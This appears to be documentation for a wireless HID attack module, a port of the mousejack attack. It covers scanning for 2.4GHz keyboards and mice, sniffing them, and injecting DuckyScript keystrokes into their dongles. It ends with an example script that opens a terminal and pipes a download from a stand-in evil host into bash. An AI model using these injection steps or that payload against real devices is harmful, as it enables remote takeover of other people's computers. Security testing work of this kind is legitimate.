This module, which is a port of Bastille’s mousejack attack, performs scanning and frames injection for HID devices on the 2.4Ghz spectrum, using Nordic Semiconductor nRF24LU1+ based USB dongles and Bastille’s RFStorm firmware.
The module will work with one of the devices supported by RFStorm:
In order for this module to work, you need to make sure you installed the Bastille’s RFStorm firmware on one of the supported devices.
Once flashed with the proper firmware and connected to your computer, dmesg should report the device as:
usb 3-1.3: new full-speed USB device number 8 using xhci_hcd
usb 3-1.3: New USB device found, idVendor=1915, idProduct=0102
usb 3-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
usb 3-1.3: Product: Research Firmware
usb 3-1.3: Manufacturer: RFStorm
The attack is known to support detection and DuckyScript injection for the following devices:
hid.recon onStart scanning for HID devices on the 2.4Ghz spectrum.
hid.recon offStop scanning for HID devices on the 2.4Ghz spectrum.
hid.clearClear all devices collected by the HID discovery module.
hid.showShow a list of detected HID devices on the 2.4Ghz spectrum.
hid.sniff ADDRESSStart sniffing a specific ADDRESS in order to collect payloads, use ‘clear’ to stop collecting.
hid.inject ADDRESS LAYOUT FILENAMEParse the DuckyScript FILENAME and inject it as HID frames spoofing the device ADDRESS, using the LAYOUT keyboard mapping (available layouts: BE BR CA CH DE DK ES FI FR GB HR IT NO PT RU SI SV TR US).
The command hid.inject does not require the HID device to be visible via the hid.show command. If you know the address of the dongle already, you can simply set the hid.force.type parameter to one among logitech (the default value), amazon or microsoft and run the injection “blindly”.
| parameter | default | description |
|---|---|---|
hid.lna |
true |
If true, enable the LNA power amplifier for CrazyRadio devices. |
hid.hop.period |
100 |
Time in milliseconds to stay on each channel before hopping to the next one. |
hid.ping.period |
100 |
Time in milliseconds to attempt to ping a device on a given channel while in sniffer mode. |
hid.sniff.period |
500 |
Time in milliseconds to automatically sniff payloads from a device, once it’s detected, in order to determine its type. |
hid.force.type |
logitech |
If the device is not visible (if you want to talk directly to a dongle without connected devices) or its type has not being detected, force the device type to this value. Accepted values: logitech, amazon, microsoft. |
hid.show.filter |
Defines a regular expression filter for hid.show. |
|
hid.show.sort |
mac desc |
Defines sorting field (mac, seen) and direction (asc or desc) for hid.show. |
hid.show.limit |
0 |
Defines limit for hid.show. |
Enable HID discovery, use the ticker module to display detected devices, wait for the device 32:26:9f:a4:08 to be detected and inject the ducky.txt script as HID frames using the US keyboard layout:
> set ticker.commands clear; hid.show; events.show 10
> hid.recon on
> ticker on
# ... wait for the device to be detected, using `hid.show` ...
> hid.inject 32:26:9f:a4:08 US ducky.txt
Send the ducky.txt script keystrokes to the dongle with address 32:26:9f:a4:08 forcing its type to logitech and without waiting for any connected device to be visible:
> set hid.force.type logitech
> hid.recon on
> hid.inject 32:26:9f:a4:08 US ducky.txt
Example ducky.txt (for a complete list of available commands see the documentation):
GUI SPACE
DELAY 200
STRING Terminal
ENTER
DELAY 500
STRING curl -L http://www.evilsite.com/commands.sh | bash
ENTER
Hacking Logitech devices: